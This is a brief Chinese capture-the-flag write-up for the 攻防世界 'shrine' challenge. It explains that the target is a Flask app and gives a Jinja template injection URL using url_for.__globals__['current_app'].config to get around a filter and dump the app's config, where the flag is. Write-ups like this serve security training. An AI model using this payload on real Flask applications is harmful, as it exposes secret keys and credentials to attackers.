攻防世界-shrine

原题

解题思路

        明显使用的flask框架,那就用flask模板注入。 查看配置文件config。注意config在函数safe_jinja中使用了。

http://61.147.171.105:59211/shrine/%7B%7Burl_for.__globals__['current_app'].config%7D%7D

        flag就在config中。

 

你可能感兴趣的:(网络安全)